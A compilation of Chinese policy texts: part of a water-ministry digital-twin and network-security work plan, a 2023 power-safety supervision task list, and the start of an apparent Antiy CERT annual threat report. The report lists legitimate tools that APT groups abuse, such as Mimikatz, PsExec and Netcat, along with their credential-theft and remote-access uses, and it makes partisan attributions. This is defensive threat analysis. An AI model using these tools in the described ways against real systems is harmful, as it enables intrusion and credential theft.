40.推进商用密码应用。开展以商用密码技术为核心的水利部数据安全治理平台项目建设,大力推进商用密码在小浪底水利枢纽、大藤峡水利枢纽等水利工程关键信息基础设施的应用,坚持数字孪生水利建设与密码应用“同步规划、同步建设、同步运行”原则,持续将商用密码应用落实情况统筹纳入水利网络安全监督检查范围,推动密码应用与网络安全、数据安全融合发展。   41.推进试点示范工程。持续推进水利部信息中心、黄河水利委员会、海河水利委员会、珠江水利委员会IPv6技术创新和融合应用试点项目,配合开展试点项目中期评估。总结水利部信息中心、山东省水利厅、浙江省水利厅网络安全试点示范项目成果,在水利行业进行推广应用。组织中国长江三峡集团有限公司、中国南水北调集团有限公司、水利部信息中心、水利部小浪底水利枢纽管理中心完成国家关键信息基础设施安全防护试点项目。加快实施中国长江三峡集团有限公司、中国南水北调集团有限公司国产化改造项目。   六、不断强化保障措施   42.加强先行先试。通过“晒、比、促”推进56家单位加快实施94项先行先试任务,加强跟踪指导,定期通报进展,线上线下相结合强化监督检查,开展验收总结。组织召开数字孪生水利建设工作会议。   43.加大资金投入。积极争取资金投入,拓宽资金来源,统筹资金渠道,利用中央财政、地方财政、水利工程管理单位自筹资金等推进数字孪生水利建设、已建水利工程智能化改造及在建水利工程智能化建设,新建水利工程要保障数字孪生建设和网络安全资金投入,足额保障运行维护经费,确保建设成果持续发挥效益。   44.加快项目立项。完善国家水利大数据中心可研报告,协调国家发展改革委受理评审水工程防灾联合调度系统、国家水利综合监管平台等项目,争取开工建设长江流域全覆盖水监控系统、水利部数字孪生安全监控感知预警能力建设项目(一期)、水工程防灾联合调度系统以及数字孪生三峡等项目。   45.加强科技攻关。开展工程安全实时监测、智能快速调度、远程安全集控、多维场景耦合计算与展示等技术攻关。持续实施好“多尺度流域水资源和水利设施遥感监测应用示范”国家重点研发计划项目及“数字孪生流域模拟仿真引擎关键技术研究与应用”等水利部重大科技项目。   46.加强人才保障。进一步加强智慧水利人才培养基地和国家关键信息基础设施(水利)网络安全技术人才创新团队建设,加大数字孪生水利关键领域人才培养力度,强化产学研用深度融合,多学科交叉整合,努力培养数字孪生水利复合型高层次人才。   47.加强宣传培训。组织做好数字孪生水利建设新闻发布会和阳光走廊展览。发布《2022年全国水利网信发展报告》。组织《水利信息化》期刊编撰与发行。利用一网(网站)、一微(微信)、一报(简报)宣传平台,为水利网信工作营造良好舆论氛围。开展数字孪生水利技术培训,组织水利行业开展网络安全专题宣传。
standards
2023 年电力安全监管重点任务 一、指导思想 以习近平新时代中国特色社会主义思想为指导,认真学习贯 彻党的二十大精神,深入贯彻落实习近平总书记关于安全生产重 要论述,严格落实党中央、国务院关于安全生产的各项决策部署, 坚持“安全第一、预防为主、综合治理”,统筹发展和安全,扎 实推进落实《电力安全生产“十四五”行动计划》,着力防范化解 重大电力安全风险,高效开展电力安全专项监管和重点监管,努 力提升安全监管效能,不断加强电力应急管理,持续推动电力安 全治理体系和治理能力现代化,为全面建设社会主义现代化国家 营造安全稳定的电力供应环境。 二、基本目标 杜绝重大以上电力人身伤亡责任事故、杜绝重大以上电力安 全事故、杜绝电力系统水电站大坝垮坝漫坝事故,确保电力系统 安全稳定运行和电力可靠供应,保持电力安全生产形势稳定。 三、重点任务 (一)认真学习贯彻党的二十大精神和习近平总书记关于安 全生产重要论述 1.认真学习贯彻党的二十大精神。深入学习宣传贯彻党的二 十大精神,及时传达学习党中央、国务院关于安全生产决策部署, 准确领会和把握党中央、国务院对电力安全工作的新部署和新要 1 求,进一步增强做好电力安全监管工作重要性认识,筑牢电力安 全工作思想基础。 2.全面学习贯彻习近平总书记关于安全生产重要论述。将学 习习近平总书记关于安全生产重要论述和重要批示纳入各级党 委(党组)学习计划和干部员工教育培训计划,坚持以人民为中 心的发展思想,树牢人民至上、生命至上理念。贯彻落实“三管 三必须”和国务院安委会十五条硬措施要求,进一步落实地方电 力安全管理责任,完善齐抓共管机制。 3.加强电力安全宣传教育培训。加强电力安全文化建设,认 真组织开展“安全生产月”“安全生产万里行”等活动。聚焦构 建新型能源体系和新型电力系统,深入研究电力安全生产面临的 新形势、新挑战,提出应对举措。举办第三届电力安全管理和技 术论坛。组织开展电力安全监管培训。 (二)认真贯彻党中央、国务院决策部署 4.加强电力安全工作统筹协调。充分发挥国家能源局安全生 产工作领导小组和全国电力安委会作用,加强对电力安全监管工 作的统筹协调和把关定向。配合做好 2022 年度国务院安委会成 员单位安全生产考核工作,全面落实考核反馈意见。精简高效开 展派出能源监管机构电力安全生产考核。 5.全力做好电力供应保障。开展年度电网运行方式和电力供 需形势分析,做好迎峰度夏(冬)等重点时段电力安全保障和突 发事件应对工作,加强燃煤机组非计划和出力受阻停运监管,确 2 保电力安全可靠供应。组织做好全国“两会”、杭州亚运会、“一 带一路”国际合作高峰论坛等重大活动保电和网络安全保障工 作。 6.推进能源重大基础设施安全风险评估。总结试点工作经 验,制定能源重大基础设施安全风险评估实施细则,推进全面评 估和专项评估工作,保障能源重大基础设施安全可靠运行。 7.做好电力行业防汛抗旱工作。按照国家防汛抗旱总指挥部 统一部署,认真做好电力行业防汛抗旱工作,组织开展防汛抗旱 督查检查,加强水电站大坝度汛安全监管。 (三)防范化解重大电力安全风险 8.做好电力安全风险管控和隐患排查治理工作。优化电力安 全风险管控会议和风险管控周报等“季会周报”工作机制。落实重 大电力安全隐患监督管理规定和判定标准,组织开展宣贯和隐患 报送工作,滚动调整重大隐患清单,强化重大隐患挂牌督办。 9.加强大电网骨干网架安全监管。持续强化重要输变电设施 安全风险管控,发挥有关输电通道联合防控工作机制作用,组织 经验交流,协调重点、难点问题,加强重大输电工程路径密集性 风险评估。通过宣传培训、现场检查等多种形式,督促电网企业 落实直流输电系统安全管理有关政策文件要求。加强与设备质量 监管机构、行业协会等部门的监管协同,提升电力设备质量,切 实防范电力设备安全事故。 10.加强电网安全风险管控。完善电网运行方式分析制度, 3 形成覆盖全年、层次清晰、重点突出的电网运行方式分析机制。 组织开展电化学储能、虚拟电厂、分布式光伏等新型并网主体涉 网安全研究,加强“源网荷储”安全共治。推进非常规电力系统 安全风险管控重点任务落实。 11.推进电力行业网络与信息安全工作。组织开展网络安全 五年行动计划中期评估,持续推进电力行业网络安全“明目”“赋 能”“强基”行动。加强网络安全态势感知能力建设,推进国家级 电力网络安全靶场建设,组织开展年度攻防演练。修订行业网络 安全事件应急预案,建立完善网络安全监督管理技术支撑体系, 推动量子计算、北斗、商用密码等在电力行业的应用。 (四)开展电力安全专项监管和重点监管 12.开展电力二次系统安全管理专项监管。落实《电力二次 系统安全管理若干规定》,建立完善电力二次系统安全管理书面 报告制度。对电力企业落实二次系统安全管理有关政策规定情 况、二次系统技术监督工作开展情况开展专项监管,印发《电力 二次系统安全管理专项监管报告》。 13.开展电力行业关键信息基础设施安全保护专项监管。制 修订电力关键信息基础设施安全保护政策性文件,动态开展认 定。对电力行业运营者落实关键信息基础设施安全保护要求的有 关情况开展专项监管,印发《电力行业关键信息基础设施安全保 护专项监管报告》。 14.开展水电站大坝安全提升专项行动。加强水电站大坝安 4 全注册和定期检查工作。对乙级注册大坝开展全覆盖监督检查, 督促指导电力企业开展极端事件后果分析,制定强化大坝关键设 备管理措施,按时高质量完成风险隐患整治工作。督促指导电力 企业加快推进大坝安全信息化建设,按要求建立大坝安全在线监 控系统。专项行动持续 2 年时间,发布《水电站大坝安全提升专 项行动总结报告》。 15.开展海上风电施工安全专项监管。编写海上风电施工安 全检查(督查)事项清单,细化安全监管要求。加强与地方应急、 海事、交通运输等部门的协调沟通,进一步形成监管合力。做好 海上风电质监工作。发布《海上风电施工安全和质量监督专项监 管情况通报》。 16.开展重要直流输电系统安全监管。在东北、华中区域对 电力企业落实直流输电系统安全管理相关政策文件情况开展监 管,印发《东北区域直流输电系统安全监管报告》《华中区域直 流输电系统安全监管报告》。 (五)持续提升安全监管工作效能 17.健全电力安全监管规章制度体系。继续梳理完善电力安 全监管涉及法律法规和规范性文件,推进《电力安全事故应急处 置和调查处理条例》《电力安全生产监督管理办法》《电力监控 系统安全防护规定》《电力建设工程施工安全监督管理办法》等 法规规章修订工作。 18.加强电力安全监管执法。落实新《安全生产法》《电力 5 安全监管执法指引》等要求,依法依规开展电力安全监管执法, 加大力度打击惩治电力安全违法违规行为。每季度向全社会公布 典型电力安全监管执法案例,发挥执法案例震慑警示作用。 19.完善电力安全事故统计分析。建立事故分析监管研判机 制,按月编制事故快报,按年汇编统计全年事故情况,针对性提 出监管意见建议,督促有关企业深入分析事故背后的体制机制、 安全投入、教育培训等管理原因。 20.深化事故“说清楚”机制。以人身事故为重点,由事故 企业负责人在电力安全风险管控会议上“说清楚”,剖析事故原 因,督促电力企业深刻吸取事故教训,将人民至上、生命至上理 念深度融入电力安全生产管理全过程。 (六)做好日常安全监管工作 21.深化电力可靠性管理。修订印发《关于加强电力可靠性 管理工作的意见》,试点推广以可靠性为中心的设备检修策略研 究成果。开展全国电力可靠性数据自查、互查和专项检查,探索 发电设备基于实时数据的可靠性指标系统,提升数据质量。 22.加强施工安全监管和工程质量监督工作。对全国在建电 力建设重点工程(水电、大型火电、抽水蓄能、特高压工程、大 型风电光伏工程)开展“四不两直”施工安全及质量监督专项督 查。做好以信用为基础的新型电力安全监管机制试点。推动电力 建设施工领域智慧工地建设。指导有关行业协会推进产业工人实 名制平台开发建设应用。制定《电力建设工程质量监督机构考核 6 管理办法》《新型储能电站建设工程质量监督检查大纲》,对电 力质监机构开展调研督导。 23.加强煤电安全监管。深入分析煤电机组定位变化对安全 生产的影响,研究煤电机组深度调峰安全评估标准规范。梳理全 国煤电机组设计寿命总体情况,组织研究机组延寿安全评估标准 规范。继续推进煤电机组普遍性、家族性风险隐患整治。督促电 力企业加强燃煤(生物质)电厂除尘器等设备设施缺陷隐患排查 治理,继续推进公用燃煤电厂液氨重大危险源尿素替代改造工 作。 24.加强新能源发电安全监管。加强风电、光伏、小水电并 网安全评价行业标准宣贯执行。研究制定新能源涉网安全监督管 理措施和流程。开展小散远发电企业安全排查专项行动“回头 看”。 25.加强电力行业防雷安全管理。研究推进电力行业防雷装 置检测和雷电防护信息化推广应用,梳理电力工程建设、生产运 行等阶段防雷管理工作。 (七)加强电力应急管理 26.加强电力应急能力建设。开展国家级应急基地和应急研 究中心顶层规划设计,统一基础功能、突出专业特色,研究布局 建设全国性基地。研究国家级电力应急救援队伍、应急救援物资 征集调用机制,进一步强化电力应急工作支撑体系。 27.开展大面积停电事件应急演练。演练电力系统互济和跨 7 省区支援,切实增强应对迎峰度夏等大负荷和自然灾害等极端情 况下的应对处置能力。 28.推进电力应急管理基础工作。推进行业应急预案修编和 预案体系完善工作。积极推进电力应急能力建设评估工作,定期 开展评估。 8
standards
导语 每年年初对上一年度全球网络安全威胁的情况进行分析和总结,发布整体回顾,进行新年展望,是安天研究与应急处理中心(安天CERT)坚持多年的传统,对安天来说,这就是“年报”。年报的编写通常从每年11月开始准备,在12月底完成初稿,在1月上旬的网络安全冬训营上发布年报的“征求意见版”,征求参会专家的意见建议,之后进行补充完善,并在春节前后正式公布。但如果细心人浏览,安天过去几年的威胁年报,会发现其都是“征求意见版”,说明报告最终未通过安天技术委员会的审核,只能以“征求意见版”完成发布。对安天CERT来说这是年度工作未完全闭合的遗憾,对整个安天来说,这是面对场景、威胁、客户的巨大变化中,知行脱节的迷茫。 早期的“年报”并不依赖安天CERT输出,基本上将年度样本分析平台各个维度关于恶意代码的统计输出,再辅以简单的说明,就可以以很小的人力投入完成工作。也符合彼时,安天再产业体系中,只是作为反病毒引擎上游厂商,而不直接面对政企客户场景的简单定位。但从震网事件开始,安天的分析溯源能力向防御场景伸展,安天着手研发全主机平台防护的内核和产品,同时也发布辅助溯源猎杀的流量侧和系统侧工具。我们看到APT攻击的高度定向性化的杀伤链与复杂的IT场景叠加;各种不同的威胁行为体的攻击活动都在挑战网络安全治理时。这些样貌,越来越不是简单的统计分析所能代表。因此我们提出了从数据型年报,走向观点型的思路,并坚持数年,其中不乏若干我们引为自豪的预见,其中包括“勒索软件将与蠕虫合流”,“勒索攻击将具备APT的能力”等带有一定前置性的风险示警,但在WarryCry的大爆发、还是RaaS(勒索即服务)与定向攻击的合流真正发生时,我们却无法因准确做出了提前示警而“欣慰”,因为我们无法判断我们“前置示警”是否让用户做出了 “前置防御”,甚至对很多IT设施的防护能力提升俩看,我们还没有看到“灾难以进步为补偿”(恩格斯语)。也因为此,作为威胁分析者和检测能力的赋能方,我们要发现重要问题,也要提出关键解法——这就是两年来,安天倡导和践行的执行体治理安全理念。 与此同时,我们今年对年报结构的进行了新的重大调整,增加2023年度威胁执行体与战术统计分析。这是恶意代码全貌再次回归到“年报”当中。数年前,我们认为这些枯燥的分类统计和饼图柱图,已经并不能对读者带来更多的观测价值。但我们在这几年很沉重的发现,由于缺少恶意代码的种类、数量全貌的持续发布,部分用户开始忽视反恶意代码和主机安全防护的基础能力建设,而更关注对齐更多安全手段,忘记了恶意代码检测并非一项功能开关,反病毒引擎是需要全面捕获能力、海量分析算力和专业分析团队的来支撑的安全能力。这也是我们首次发布TOP10的攻击高频应用的非恶意执行体。我们也基于对攻击事件中攻击技战术分析的累计,发布了ATT&CK年度攻击技战术TOP10。 我们今年强化了威胁趋势的总结,增加了防御和治理思考。需要说明的是,在年报启动编写的时点,也正是是多起Lockbit组织系列重大定向勒索攻击被关注的时点,因此我们将年报关于威胁总结和防御治理思考中与定向勒索攻击相关内容提前输送到了《波音遭遇勒索攻击事件分析复盘—定向勒索的威胁趋势分析与防御思考》分析报告中。 在威胁分析方面与往年结构类似,安天也总结了高级持续性威胁(APT)、勒索威胁、挖矿威胁、其他黑产威胁,数据泄露威胁以及威胁泛化等方向的思考与观点。 网络攻击并不是简单的是一种技术行为,其是特定组织和个体带有特定意图所开展的特殊行为活动。因此分析网络攻击从战术和防护角度,既要以其载荷(执行体)和战术为重点,以资产环境为场景。同时也要关注其背后的动机和威胁行为体,同时要把对被攻击目标影响后果损失的分析,叠加国家安全、社会治理安全和相关的公民个人安全的层面进行分析。 表格 1 2023年典型网空威胁行为体作业动机、战术特点、目标资产和业务后果对比表 关于高级持续性威胁(APT):安天梳理了2023年全球APT组织及行动的分布和活跃情况,制作了“全球APT攻击行动、组织归属地理位置分布(活跃)图”,其中APT组织共556个,而代表最高攻击水平的A2PT攻击组织全部分布在美国。其他对我国和周边国家地区有较高威胁的攻击组织来自印度等国家和我国台湾地区。我们选取2023年典型代表网空威胁行为体,分析他们的威胁等级,发起攻击活动的动机因素、战术特点、目标资产和产生业务后果,尽可能的展示2023年网络空间的威胁全貌,通过分析发现,网空霸权和地缘安全博弈依然是当前网空攻击的主要持续性动机和因素,该类攻击代表当前网空攻击的最高能力,其目标广度和深度均全面覆盖,造成后果也最为严重;地域性临时冲突则是今年网空攻击的阶段性上升因素,此类攻击以俄乌冲突和巴以冲突背景下的网空攻击活动为代表,其战术特点根据各方能力有所不同,但总体围绕情报获取、制造混乱和毁瘫为作业目的;利益和金钱则是近些年网空攻击持续上升的动机和因素,随着加密货币和RaaS模式的兴起,其善于利用漏洞窗口期,攻击活动越发频繁,造成危害也越来越大;而意识形态、宗教冲突等则是特定区域或组织发起网空攻击的动机和因素,其作业主要以意识形态传播、威胁恐吓、制造恐慌为目的;最后则是技术研究和炫技的个人黑客攻击活动的动机和因素,其目标不定且部分没有明确目的,造成后果危害相对一般。 智能移动终端设备面临A2PT的攻击挑战,闭源系统反而由于其系统和生态特性一旦被攻击可能长期不被发现,当前的手机和智能终端的安全性除依托系统本身还需要更多的安全关注。 APT组织借鉴公开情报制作假旗隐蔽攻击线索,通过制造、遗留明显的假旗线索误导分析人员的溯源调查方向,甚至可以起到瞒天过海的效果,但经验丰富的研究人员仍可发现技术细节中的矛盾之处。 A2PT组织的高阶攻击技术因曝光示范和失控泄露的等原因,被更多APT组织广泛采纳应用于自身行动中,定向勒索等黑产活动,也在跟进模仿,传统中低等级的APT组织和黑产攻击都将因此更难发现、防御与溯源。 关于勒索威胁:勒索攻击的主流威胁形态已经从勒索团伙传播扩散或广泛投放勒索软件收取赎金,转化为RaaS+定向攻击收取高额赎金的运行模式。RaaS为Ransomware as a Service(勒索即服务)的缩写,是勒索团伙研发运营的勒索攻击基础设施,包括可定制的破坏性勒索软件、窃密组件、勒索话术和收费通道等。各种攻击团伙和个人租用RaaS攻击基础设施,在获得赎金后,与RaaS攻击组织分账结算。随着RaaS的兴起,勒索攻击不再有技术门槛,通过简单的页面点击,即定制可生成窃密、勒索等攻击载荷,因此内部人员攻击可能激增,更需要警惕传统电诈犯罪转化为社工+勒索攻击犯罪。与此同时,针对大型政企机构,实施定向勒索攻击的行为体已具备APT水平,定向勒索攻击成为大型政企机构的噩梦。勒索攻击已经是由持续定向入侵、窃取数据、加密数据瘫痪系统、勒索金钱、挖掘数据关联价值二次利用、贩卖数据、向监管机构举报、公开窃取数据所构成的一条价值侵害链,而且已经形成了一个规模极为庞大的犯罪产业。在这样的背景下,遭遇勒索攻击的风险已经不是简单的以数据损失和业务暂停为后果的形态,而是要付出失窃的所有数据均会被贩卖、公开等一系列的连锁风险。 关于挖矿威胁:未来的挖矿木马将出现更多的由AI生成的挖矿脚本,这将继续降低攻击者的成本。随着挖矿木马攻击者对利润的不断追求,结合Rootkit技术的挖矿木马将变得越来越复杂。使用Shell脚本编译器(SHC)对脚本进行加密的做法也愈发流行,SHC成为了攻击者新的工具选择,以增强其挖矿脚本的隐蔽性。 关于黑产威胁:2023年,来自黑产团伙的威胁呈现出手段不断变化和资源快速更换等特点。以2023年最活跃的黑产团伙“游蛇”为例,其针对我国国内用户的网络钓鱼攻击和诈骗活动,规模较大且持续时间较长,对企业造成了一定的经济损失。这类黑产团伙传播的恶意程序变种多、免杀更新速度快、基础设施更换频繁、攻击目标涉及行业领域广泛。从攻击手段看,以“白加黑”加载恶意载荷、内存执行Shellcode、内存解密载荷文件为主。安天CERT将具有上述特点的黑产团伙统称为“游蛇”。 关于数据泄露威胁:一些组织存储的高价值的数据资产成为了攻击者的目标,勒索威胁伴随着数据泄露的风险,利用高危漏洞引发的数据泄露造成的影响也不容小觑,政治因素引发的数据泄露甚至能影响国际形势。 关于威胁泛化:威胁泛化导致用户的资产暴露面增加,攻击者利用增加的攻击面可以产生非授权访问、跳板攻击、入侵“隔离网络”、资产被控、资产破坏、数据泄露等广泛的安全威胁。 2.2023年度威胁执行体和攻击战术的整体情况 武器和战术是分析网络攻击的两个重要基本要素,攻击武器,即我们常说的攻击载荷,绝大多数是“执行体”,攻击战术也依托执行体封装执行。多数攻击武器是以攻击为目的所开发的恶意代码(恶意执行体),为了进一步规避检测,攻击者也开始使用正常软件(非恶意执行体)与恶意执行体组合投放作业达成攻击目的。 2.1 2023年恶意代码执行体分析统计 截至2023年12月31日,安天捕获有效恶意代码执行体总量为1,361,149,760个(按MD5值统计),即13亿6114万9760个,并可以映射到百亿规模的HASH样本空间。(安天坚持有效样本的统计原则,以避免统计对判断的干扰,包括:对感染式病毒、变形病毒、宏病毒、云端变形投放(Poly by Server)等情况,均依托按照文件透结构、宿主文件大小定义,均按照技术规范所需的样本数量的上线统计,以避免大量HASH不同但实际病毒体一致的数量干扰。后续涉及样本统计,均指有效样本)安天依据恶意代码样本的8个基础分类,即特洛伊木马(Trojan)、蠕虫(Worm)、感染式病毒(Virus)、黑客工具(HackTool)、灰色软件(Grayware)、风险软件(Riskware)、测试文件(TestFile)和垃圾文件(JunkFile),据此分类统计,如图1-1所示: 数量最多的前三个分类依次是特洛伊木马、灰色软件和感染式病毒,恶意代码执行体数量分别为732,421,518个、244,231,566个和185,051,567个,占比分别为53.81%、17.94%和13.60%。 其中,2023年度新增捕获恶意代码执行体数量为157,328,081个(按MD5值统计),即1亿5732万8081个。依据恶意代码的8大基础分类,统计数据如图1-2所示: 数量最多的前三个分类依次是特洛伊木马、蠕虫和灰色软件,恶意代码执行体数量分别为114,891,344个、18,501,705个和12,744,053个,占比分别为73.03%、11.76%和8.10%。 与上一年度(2022年度)相比,2023年度新增捕获恶意代码执行体中,数量增长最多的类别为特洛伊木马,年度差异数量值为50,945,459个,同比增长79.67%;数量减少最多的类别为灰色软件,年度差异数量值为38,785,334个,同比下降75.27%。 更多关于恶意代码知识及统计信息,可前往安天计算机病毒分类命名知识百科(virusview.net)进一步查阅。 根据安天公司监测结果,2023年与2022年新增捕获恶意代码家族数量分类比较如下图所示,2023年监测结果与去年相比,绝对数量增长最多的是木马,全年捕获木马类家族数量为2503个,与去年相比增长1216个。 图2-13 2023年度,新增恶意 2.2 2023年网空攻击的常见非恶意代码执行体 随着网络攻击手段和渠道的多元化发展,APT组织不断改进其技战术策略,除了使用商业工具、自研工具以及开源工具外,也逐渐将合法工具纳入其武器库。基于对2023年全球APT攻击事件的持续监测与分析发现,APT组织的攻击活动中涉及近50种合法工具,包括但不限于Mimikatz、PsExec、AnyDesk、AdFind、PLink等,不仅涉及Gamaredon、舒适熊/APT29、奇幻熊/APT28等高能力APT组织,也包括污水/MuddyWater、Kimsuky、拉撒路/Lazarus等一般能力APT组织。通过使用合法工具,APT组织能够将恶意活动隐藏在正常的网络流量中,绕过网络安全防御策略。同时,合法工具也大大增加了安全人员对APT组织追踪溯源的难度。在网络安全防护能力不断提升的安全趋势下,APT组织将会继续使用合法工具来增加攻击成功率,通过对合法工具进行灵活配置,在目标系统上隐秘执行凭证转储、权限提升、信息收集等不同恶意活动,以适应不同业务场景下的APT攻击。 APT组织使用的合法工具TOP 10包括Mimikatz、PsExec、AnyDesk、AdFind、Plink、Netcat、TeamViewer、Masscan、UltraVNC、Ligolo,工具的描述信息如下: Mimikatz是一款黄帽子(黑客)工具,最初由法国黑客Benjamin Delpy开发,并于2011年首次发布,该工具除了可执行文件版本外还存在脚本类型版本。Mimikatz的主要功能是获取和操控Windows操作系统中的凭证,如用户登录密码、Windows登录凭据(NTLM哈希和Kerberos票据)以及各种应用程序和服务的凭证。Mimikatz设计的目的是揭示Windows系统中密码和凭证管理的薄弱点,并用于安全专业人员的演示和教育目的。然而,由于其功能强大且广泛被黑客所利用,Mimikatz也被视为危险的工具,用于进行恶意攻击、数据窃取和潜在的勒索活动。凭借其高度灵活和兼容性,Mimikatz已被APT组织或网络犯罪组织应用于攻击活动中,其中安天于2020年监测到苦象组织使用PowerShell脚本形式的Mimikatz工具。 Psexec是一个命令行网络管理工具,是Sysinternals Suite系统组件的一部分,其调用了Windows系统的内部接口,以远端Windows主机账户名、密码和要执行的本地可执行文件为输入参数,基于RPC$服务实现,将本地可执行文件推送到远端主机执行,其设计初衷是为了便于网络管理人员以实现敏捷的远程运营。但由于其作为命令行工具便于被调用封装,也导致极易被攻击者作为攻击工具使用,在完成口令破解后,实现一次性投放执行。早在2003年,广泛出现大量基于空口令和常见口令进行传播的系列“口令蠕虫”,大部分都使用了这个机制。特别是出品该系统组件的Sysinternals的团队在2006年7月18日被微软收购,导致其后续版本都带有微软的数字签名,所以也连带导致其会被较大比例的安全软件放行。 AnyDesk是一款由德国公司AnyDesk Software GmbH推出的远程桌面软件。用户可以通过该软件远程控制计算机,同时还能与被控制的计算机之间进行文件传输,主要应用于客户日常运维和业务相关主机的远程管理。这一软件是常用网管工具、由正规软件研发企业发布,且有对应厂商数字签名,往往被作为白名单软件。但这也使攻击组织在活动中利用这类软件的远程管理功能实现持久访问、文件传输,并利用其是合法签名执行体来规避检测。 Adfind是一款在域环境下的信息搜集工具,允许用户在域环境下轻松搜集各种信息。它提供了大量的选项,可以优化搜索并返回相关详细信息,是内网域渗透中的一款利器。 Plink工具是PuTTY软件中的一个组件,主要功能类似于Linux系统上的ssh命令行工具,用于SSH连接远程主机,同时提供多种方式创建或管理SSH会话。由于其属于PuTTY软件的一个组件,具备数字签名,能够规避以数字签名作为白名单检测机制的终端防护软件的检测。 Netcat是一款简单的Unix实用程序,支持Windows和Linux环境,用于在TCP或UDP协议连接的网络上读取和写入数据。该实用程序能够直接使用或由其他脚本启动,由于使用简单且灵活,常被用于网络调试或各种网络脚本中,以建立网络连接。 TeamViewer是一款远程桌面工具,兼容于Microsoft Windows、macOS、Linux、iOS、Android操作系统,支持远程控制和在线协作等功能。 Masscan是一款高速端口扫描工具,具备出色的扫描效率和大规模扫描的能力,支持TCP和UDP协议的扫描,并能够根据用户的需求指定多个目标和端口。同时,Masscan还采用了网络性能优化技术,充分利用操作系统的资源和多核处理能力,实现了卓越的扫描效率和吞吐量。 UltraVNC是一款开源远程管理/远程桌面软件实用程序。客户端支持Microsoft Windows和Linux,但服务器仅支持Windows。它使用VNC协议,允许一台计算机通过网络连接远程访问和控制另一台计算机。 Ligolo是一款专为安全测试人员设计的轻量级反向隧道工具,实现和使用都非常简单,可以帮助渗透测试研究人员轻松通过一个反向连接建立一个完全安全的SOCKS5或TCP通信隧道。与Meterpreter等工具相比,Ligolo的运行速度更快,并且更加稳定。 表2-1 APT组织使用的合法工具 装备名称 装备类型 运行平台 核心功能 关联威胁组织 Mimikatz 正常工具 Windows 权限提升、凭据窃取 拉撒路/Lazarus、污水/MuddyWater、海莲花/APT-TOCS、舒适熊/APT29、白象/WhiteElephant等 PsExec 实用程序(Utility) Windows 远程访问、命令执行 Gamaredon、舒适熊/APT29、图拉/Turla、人面马/APT34等 AnyDesk 正常工具 Windows、Linux、macOS、Android 、iOS等 远程控制 苦象/Bitter、Gamaredon、舒适熊/APT29等 AdFind 正常工具 Windows 域信息搜集 舒适熊/APT29、拉撒路/Lazarus等 PLink 正常工具 Windows、Linux 端口转发 拉撒路/Lazarus、污水/MuddyWater、Charming Kitten /APT35、Chafer/APT39等 Netcat 实用程序(Utility) Windows、Linux 远程访问、文件传输、端口扫描 绿斑/GreenSpot、海莲花/APT-TOCS等 TeamViewer 正常工具 Windows、Linux、macOS、Android 、iOS等 远程控制 APT37、Kimsuky、黑店/DarkHotel等 Masscan 正常工具 Windows、Linux、macOS 端口扫描 Gamaredon 、TeamTNT等 UltraVNC 正常工具 Windows、Linux 远程控制 Chafer/APT39、Gamaredon等 Ligolo 正常工具 Windows、Linux、macOS 网络隧道 污水/MuddyWater 2.3 2023年网空威胁框架攻击技战术分析统计 基于对2023年全球APT攻击事件的持续监测和分析,梳理分析了APT攻击事件中涉及的技战术策略,并映射到网空威胁框架ATT&CK,覆盖了12个战术阶段,240多种技术和子技术,使用频率最高技术和子技术包括但不限于发现系统信息(T1082)、发现文件和目录(T1083)、发现安全软件(T1518.001)、虚拟化/沙箱逃逸(T1497)、使用应用层协议(T1071)等,涉及舒适熊/APT29、拉撒路/Lazarus、肚脑虫/DoNot、污水/MuddyWater等多个APT组织。综合来看,APT组织使用的高频技战术主要分布在发现(TA0007)、防御规避(TA0005)以及命令与控制(TA0011)战术阶段。通过对威胁框架视角的攻击映射,能够从宏观层面了解APT攻击的威胁态势,支撑安全人员制定网络安全防御策略。 表2-2 2023攻击活动中高频技战术TOP10 战术 战术名称 技术 技术名称 关联威胁组织 TA0007 发现 T1082 发现系统信息 肚脑虫/DoNot、Andariel、响尾蛇/SideWinder、舒适熊/APT29、拉撒路/Lazarus等 TA0007 发现 T1083 发现文件和目录 拉撒路/Lazarus、奇幻熊/APT28、Kimsuky、污水/MuddyWater等 TA0007 发现 T1518.001 发现安全软件 SideCopy、污水/MuddyWater、响尾蛇/SideWinder等 TA0005 防御规避 T1497 虚拟化/沙箱逃逸 污水/MuddyWater、Andariel、舒适熊/APT29、苦象/Bitter等 TA0011 命令与控制 T1071 使用应用层协议 苦象/Bitter、白象/WhiteElephant、Kimsuky、APT37等 TA0005 防御规避 T1027 混淆文件或信息 透明部落/APT36、拉撒路/Lazarus、响尾蛇/SideWinder、奇幻熊/APT28等 TA0002 执行 T1129 利用共享模块执行 奇幻熊/APT28、污水/MuddyWater、拉撒路/Lazarus、舒适熊/APT29等 TA0005 防御规避 T1036 仿冒 盲眼鹰/BlindEagle、人面马/APT34、拉撒路/Lazarus、Kimsuky等 TA0011 命令与控制 T1095 使用标准非应用层协议 拉撒路/Lazarus、透明部落/APT36、苦象/Bitter、舒适熊/APT29等 TA0007 发现 T1018 发现远程系统 苦象/Bitter、舒适熊/APT29、Andariel、白象/WhiteElephant、透明部落/APT36等 3.2023年重点威胁与风险回顾 3.1 高级持续性威胁(APT)与地缘安全冲突 2023年全球高级持续性威胁(APT)活动的整体形势依然非常严峻。基于安天持续监测的内部和外部的情报来源,2023年全球公开安全研究报告数量696篇,其中披露的安全报告涉及162个APT组织,2023年新增66个APT组织。安天梳理了2023年全球APT组织及行动的分布和活跃情况,制作了“全球APT攻击行动、组织归属地理位置分布(活跃)图”,如图 2 1,其中APT组织共556个(图片空间有限仅展示主要攻击组织),根据图示可以发现其主要分布于美国、俄罗斯、印度、伊朗、朝鲜半岛及部分国家和地区,部分组织由于情报较少未能确定归属国家或地区。 图3-1 2023年全球APT攻击行动、组织归属地理位置分布(活跃)图 3.1.1 美国依然是世界网络安全的主要威胁 A2PT是高级的高级可持续性威胁[1],是中国网络安全从业者在分析超高能力国家/地区威胁行为体的攻击活动中提出的技术概念。以美国情报机构NSA、CIA等为背景的“方程式”等攻击组织依托成建制的网络攻击团队、庞大的支撑工程体系与制式化的攻击装备库、强大的漏洞采购和分析挖掘能力,对全球关键信息基础设施、重要信息系统、关键人员等进行攻击渗透,并在五眼联盟成员国内部进行所谓的情报共享,对世界各国网络安全构成严重威胁。 2023年4月11日,中国网络安全产业联盟(CCIA)发布了长篇报告《美国情报机构网络攻击的历史回顾——基于全球网络安全界披露信息分析》 